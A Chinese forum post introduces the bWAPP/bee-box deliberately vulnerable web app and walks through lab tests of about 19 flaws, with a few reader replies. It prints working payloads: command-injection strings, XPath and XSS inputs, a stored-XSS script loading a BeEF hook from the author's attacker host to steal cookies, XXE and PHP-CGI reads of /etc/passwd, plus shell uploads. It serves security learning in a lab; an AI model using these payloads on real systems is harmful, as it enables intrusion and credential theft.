BWAPP 一款非常好用的新手学习系统
buggy web Application 这是一个集成了各种常见漏洞和最新漏洞的开源Web应用程序,目的是帮助网络安全爱好者、开发人员和学生发现并防止网络漏洞。包含了超过100种漏洞,涵盖了所有主要的已知Web漏洞,包括OWASP Top10安全风险,最重要的是已经包含了OpenSSL和ShellShock漏洞。下载&安装
bwapp可以单独下载,然后部署到apache+php+mysql的环境,也可以下载他的虚拟机版本bee-box,但是有好多漏洞是bee-box里边有,但单独安装bwapp没有的,比如破壳漏洞,心脏滴血漏洞等。我这里主要用bee-box进行介绍。
下载地址:
http://www.mmeit.be/bWAPP/
OR
http://sourceforge.net/projects/bwapp/files/bee-box/
下载后解压用vmware打开,访问80端口,bwapp默认账号密码
bee/bug
官方声称内置了100多种漏洞,具体如下:
*/ Injection vulnerabilities like SQL, SSI, XML/XPath, JSON, LDAP, HTML, iFrame, OS Command and SMTP injection
*/ Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)
*/ Unrestricted file uploads and backdoor files
*/ Authentication, authorization and session management issues
*/ Arbitrary file access and directory traversals
*/ Local and remote file inclusions (LFI/RFI)
*/ Server Side Request Forgery (SSRF)
*/ XML External Entity Attacks (XXE)
*/ Heartbleed vulnerability (OpenSSL)
*/ Shellshock vulnerability (CGI)
*/ Drupal SQL injection (Drupageddon)
*/ Configuration issues: Man-in-the-Middle, cross-domain policy file, information disclosures,...
*/ HTTP parameter pollution and HTTP response splitting
*/ Denial-of-Service (DoS) attacks
*/ HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
*/ Unvalidated redirects and forwards
*/ Parameter tampering
*/ PHP-CGI vulnerability
*/ Insecure cryptographic storage
*/ AJAX and Web Services issues (JSON/XML/SOAP)
*/ Cookie and password reset poisoning
*/ Insecure FTP, SNMP and WebDAV configurations
*/ and much more...
小试牛刀
下面是部分漏洞的测试方法:
1、HTML Injection – Reflected (GET)
http://image.3001.net/images/20150901/14411051512972.png!small
输入:<a href=http://www.baidu.com>点这里</a>
http://image.3001.net/images/20150901/14411052102546.png!small
2、iFrame Injection
http://image.3001.net/images/20150901/14411052554716.png!small
修改ParamUrl参数如下图:
http://image.3001.net/images/20150901/14411053013894.png!small
3、OS Command Injection
http://image.3001.net/images/20150901/1441105345960.png!small
输入以下字符串:
www.nsa.gov;id
www.nsa.gov&&id
www.nsa.gov|id
http://image.3001.net/images/20150901/1441105383321.png!small
4、PHP Code Injection
http://image.3001.net/images/20150901/14411054304925.png!small
修改参数message为php代码:
http://image.3001.net/images/20150901/1441105466273.png!small
5、SQL Injection (GET/Search)
http://image.3001.net/images/20150901/14411055151822.png!small
直接sqlmap即可:
http://image.3001.net/images/20150901/14411055489985.png!small
http://image.3001.net/images/20150901/14411055745290.png!small
6、XML/XPath Injection (Login Form)
http://image.3001.net/images/20150901/14411056177716.png!small
账号密码输入:a' or ''=' (此处被防Xss转义?需修改?)
http://image.3001.net/images/20150901/14411056492556.png!small
7、Broken Auth. – Password Attacks
http://image.3001.net/images/20150901/14411056916125.png!small
http://image.3001.net/images/20150901/14411057381018.png!small
其他密码测试(ssh、ftp、snmp)
http://image.3001.net/images/20150901/14411057738444.png!small
http://image.3001.net/images/20150901/1441105801979.png!small
http://image.3001.net/images/20150901/14411058313125.png!small
8、XSS – Reflected (GET)
http://image.3001.net/images/20150901/14411058713764.png!small
输入:
<script>alert(/xss/)</script>http://image.3001.net/images/20150901/14411059421339.png!small9、XSS – Stored (Blog)http://image.3001.net/images/20150901/14411059878663.png!small输入:<script src=http://192.168.245.136:3000/hook.js></script>192.168.245.136是我的kali,已经启动了beef。
http://image.3001.net/images/20150901/1441106031446.png!small
Beef上线,可获取cookie、执行js等:
http://image.3001.net/images/20150901/14411060824682.png!small
10、Insecure WebDAV Configuration
http://image.3001.net/images/20150901/14411061226506.png!small
直接put上传:
http://image.3001.net/images/20150901/14411061531309.png!small
上传成功:
http://image.3001.net/images/20150901/14411061851050.png!small
11、HTML5 Web Storage (Secret)
http://image.3001.net/images/20150901/1441106226686.png!small
使用chrome,f12查看账号密码:
http://image.3001.net/images/20150901/14411062694377.png!small
12、Heartbleed Vulnerability
http://image.3001.net/images/20150901/1441106308547.png!small
登录https://192.168.245.142:8443/bWAPP/login.phpbee/bug
http://image.3001.net/images/20150901/14411063378895.png!small
通过漏洞抓取内存,直接获取刚刚登陆的账号密码:
http://image.3001.net/images/20150901/14411063788866.png!small
13、Remote & Local File Inclusion (RFI/LFI)
http://image.3001.net/images/20150901/14411064243500.png!small
修改参数:language=/etc/passwd
http://image.3001.net/images/20150901/14411064565181.png!small
测试本地包含,修改参数:language=phpinfo.txt
http://image.3001.net/images/20150901/14411064996748.png!small
测试远程包含,修改参数:language为远程shell的地址:
http://image.3001.net/images/20150901/14411065364255.png!small
14、XML External Entity Attacks (XXE)
http://image.3001.net/images/20150901/14411065875046.png!small
点击 any bugs?,抓包,修改POST数据为:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]><reset><login>&test;</login><secret>login</secret></reset>http://image.3001.net/images/20150901/14411066293022.png!small
15、PHP CGI Remote Code Execution
http://image.3001.net/images/20150901/14411066707253.png!small
查看源代码 http://192.168.245.142/bWAPP/admin/?-s
http://image.3001.net/images/20150901/14411066999890.png!small
读取文件:http://192.168.245.142/bWAPP/admin/?-dauto_prepend_file%3d/etc/passwd+-n
http://image.3001.net/images/20150901/14411067336208.png!small
使用msf getshell:配置参数
http://image.3001.net/images/20150901/14411067734089.png!small
GETSHELL:
http://image.3001.net/images/20150901/14411068284664.png!small
16、Shellshock Vulnerability (CGI)
http://image.3001.net/images/20150901/14411068744533.png!small
抓包,修改请求http://192.168.245.142/bWAPP/shellshock.sh的请求头:
http://image.3001.net/images/20150901/14411069072500.png!small
17、Unvalidated Redirects & Forwards
http://image.3001.net/images/20150901/14411069502781.png!small
点击beam,抓包修改参数url=http://www.baidu.com:
http://image.3001.net/images/20150901/14411069788425.png!small
18、Unrestricted File Upload
http://image.3001.net/images/20150901/14411070134722.png!small
浏览,上传shell:
http://image.3001.net/images/20150901/14411070465100.png!small
19、WSDL FILE
访问:http://192.168.245.142/bWAPP/ws_soap.php?wsdl
http://image.3001.net/images/20150901/14411070909527.png!small
使用wvs对web service扫描:
http://image.3001.net/images/20150901/1441107132486.png!small
使用sqlmap测试:
http://image.3001.net/images/20150901/14411071675179.png!small
http://image.3001.net/images/20150901/14411071917866.png!small
还有其他漏洞就不一一测试了,大家有兴趣可以去测试。
对于我来说是个好东西啊,赶快安装试试去。谢楼主分享! 刚刚下载了试了试。看了看介绍等等。的确不错,连英语词汇量都能增加了。 有没有集成各个CMS已知漏洞的测试程序
页:
[1]